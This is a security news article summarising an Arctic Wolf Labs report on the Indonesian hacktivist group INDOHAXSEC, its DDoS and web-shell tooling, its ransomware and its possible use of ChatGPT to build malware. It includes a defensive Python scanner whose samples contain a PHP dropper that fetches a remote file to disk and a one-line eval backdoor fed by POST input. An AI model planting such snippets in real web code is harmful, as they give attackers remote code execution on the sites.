INDOHAXSEC’s TikTok Social Media channel | Image: Arctic Wolf Labs
A new report by Arctic Wolf Labs has shed light on a growing hacktivist group operating out of Indonesia. The group, known as INDOHAXSEC, has been making waves in Southeast Asia with a series of cyberattacks.
According to the report, INDOHAXSEC was officially established in early October 2024 and has carried out distributed denial-of-service (DDoS) attacks and ransomware deployments. The group targets private entities and government bodies within the region, using a mix of its own custom tooling and tools found online.
Arctic Wolf Labs describes the group as "largely politically motivated, but also occasionally financially driven." Hacktivism is typically carried out by individuals or loosely organized collectives as a form of online protest in support of political, ethical, or social causes. Activities range from website defacements and denial-of-service attacks to data leaks.
INDOHAXSEC uses these tactics both as a form of protest and to advance its own political ideology and objectives. The group frequently targets entities it perceives as supporting Israel, which suggests that much of its recent activity is driven by pro-Palestinian sentiment and religious ideology.
In a move that suggests a potential broadening of their ideological scope, INDOHAXSEC announced an alliance with the pro-Russian hacktivist group NoName057(16) in November 2024.
The report highlights that while INDOHAXSEC is relatively new, some of its members have been previously associated with other hacktivist groups in the region.
INDOHAXSEC maintains a GitHub repository that contains its custom tooling and a link to the group's official Telegram account. The repository holds various malicious scripts and tools written in several programming languages. Most are described as rudimentary and built for basic nefarious purposes, including DDoS attacks, website defacement, and other cyberattacks.
The report details some of the tools, including:
- Ark-Cheat-Detector: A forked and modified repository for detecting cheats in ARK: Survival Evolved. INDOHAXSEC modified the repository to include "white.php," a PHP dropper used to download a multipurpose PHP backdoor.
- NUKLIR and RUDAL: A collection of DDoS tools available in both Python and Node.js versions.
- Rudal-shell: A collection of PHP scripts including backdoors, the ExorLock ransomware, and other tools for compromising web servers.
- Xss_Fucker: A compiled Python file designed to scan target websites for cross-site scripting (XSS) vulnerabilities.
Individual members of the collective also maintain their own GitHub repositories with other tooling for DDoSing and defacing websites.
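For defenders in the region, the practical question raised by tooling like this is whether a PHP dropper or backdoor of this kind is already sitting in a web root. The following script is an added example, not Arctic Wolf's analysis and not any of the group's code: it walks a directory of PHP files and flags the two traits described above, a remote fetch followed by a write to disk (dropper behaviour) and a code-execution sink fed by request input (backdoor behaviour), plus common obfuscation wrappers. The file names, URL, and sample snippets are constructed for illustration and are not taken from the repository.

```python
"""
Added example (not Arctic Wolf's or INDOHAXSEC's code): a triage scanner that walks a
web root and flags PHP files showing dropper traits (remote fetch + write to disk) or
backdoor traits (execution sink fed by request input). Heuristic only; it surfaces
files for manual review rather than classifying them definitively.
"""
import os
import re
from dataclasses import dataclass, field

# A dropper needs to fetch remote content and persist it somewhere on disk.
FETCH_RE = re.compile(r"\b(file_get_contents|curl_exec|curl_init|fopen|fsockopen)\s*\(", re.I)
WRITE_RE = re.compile(r"\b(file_put_contents|fwrite|move_uploaded_file|copy)\s*\(", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# A backdoor runs attacker-supplied code or commands ...
EXEC_RE = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
# ... taken from an attacker-controlled source.
INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b|php://input", re.I)
# Obfuscation commonly used to hide either pattern.
OBF_RE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.I)


@dataclass
class Finding:
    path: str
    tags: list = field(default_factory=list)
    score: int = 0


def analyze_php(source: str, path: str = "<memory>") -> Finding:
    """Score one PHP source string; a score of 0 means nothing suspicious was seen."""
    f = Finding(path=path)
    if FETCH_RE.search(source) and WRITE_RE.search(source):
        f.tags.append("dropper")
        f.score += 3
        if URL_RE.search(source):
            f.tags.append("hardcoded_url")
            f.score += 1
    if EXEC_RE.search(source) and INPUT_RE.search(source):
        f.tags.append("backdoor")
        f.score += 4
    if OBF_RE.search(source):
        f.tags.append("obfuscation")
        f.score += 2
    return f


def scan_webroot(root: str) -> list:
    """Walk a directory tree and return suspicious PHP files, highest score first."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    src = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            finding = analyze_php(src, path)
            if finding.score:
                findings.append(finding)
    return sorted(findings, key=lambda f: -f.score)


# Constructed samples (not real malware) used to exercise the heuristics.
DROPPER_SAMPLE = r"""<?php
$u = 'http://example.invalid/payload.txt';  // hypothetical URL, not from the report
$c = file_get_contents($u);
file_put_contents('wp-includes/.cache.php', $c);
"""
BACKDOOR_SAMPLE = r"""<?php
if (isset($_POST['c'])) { eval(base64_decode($_POST['c'])); }
"""
BENIGN_SAMPLE = r"""<?php
$config = json_decode(file_get_contents(__DIR__ . '/config.json'), true);
echo htmlspecialchars($config['title']);
"""

if __name__ == "__main__":
    for label, src in [("dropper", DROPPER_SAMPLE), ("backdoor", BACKDOOR_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        r = analyze_php(src, label)
        print(f"{label}: score={r.score} tags={r.tags}")
```

Run `scan_webroot("/var/www")` on a server you suspect; anything scored is a candidate for review, not a verdict, since legitimate plugins and updaters also fetch and write files. The scanner is most useful when paired with a file-integrity baseline or a diff against a known-good copy of the site, so that only files that changed are triaged by hand.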
INDOHAXSEC’s TikTok channel suggests an interest in OpenAI’s ChatGPT, specifically for questions about file permissions and encryption. One video is timestamped one day before the GitHub commit history of the “website destroying malware” called “Dancokware,” which has led to speculation that ChatGPT may have been used to improve the malware.
The report notes that threat actors’ abuse of ChatGPT is not a new development: cybercriminals already use it for tasks such as crafting phishing emails and debugging code. As an illustration, the report examines Dancokware, noting its file encryption and chmod (file permission changing) capabilities.
The report also delves into the history of the ExorLock ransomware, noting that it was written by an earlier iteration of the group when it was active under the name AnonBlackFlag. In May 2024, it was claimed that ExorLock had been used against an Indian website during the country’s elections.
INDOHAXSEC, like many malicious groups, maintains a Telegram channel with over 4,000 subscribers. The channel is used for communication, coordination, and propaganda. Telegram’s minimal moderation and large group-chat capacity make it well suited to spreading narratives and organizing illicit activity.
The report notes that INDOHAXSEC has claimed to have developed a successor to the WannaCry ransomware, dubbed WannaCry 2.0; the claim is unsubstantiated.
Analysis of the group’s use of hashtags in their Telegram communications reveals insights into their targeting and victims, with #FREE_PALESTINE being the most frequently used. Further analysis of their Telegram communications indicates that India, Israel, and Malaysia are the countries most often mentioned.
INDOHAXSEC also uses social media platforms such as TikTok to showcase its activities and attract attention. More recently, it has used X (formerly Twitter) to carry out doxxing campaigns that exposed the personal information of Malaysian officials.
In response to this persistent targeting, Malaysia’s National Cyber Coordination and Command Centre (NC4) released an advisory on the heightened cyber threat of “Hacktivist Activities Targeting Malaysia.”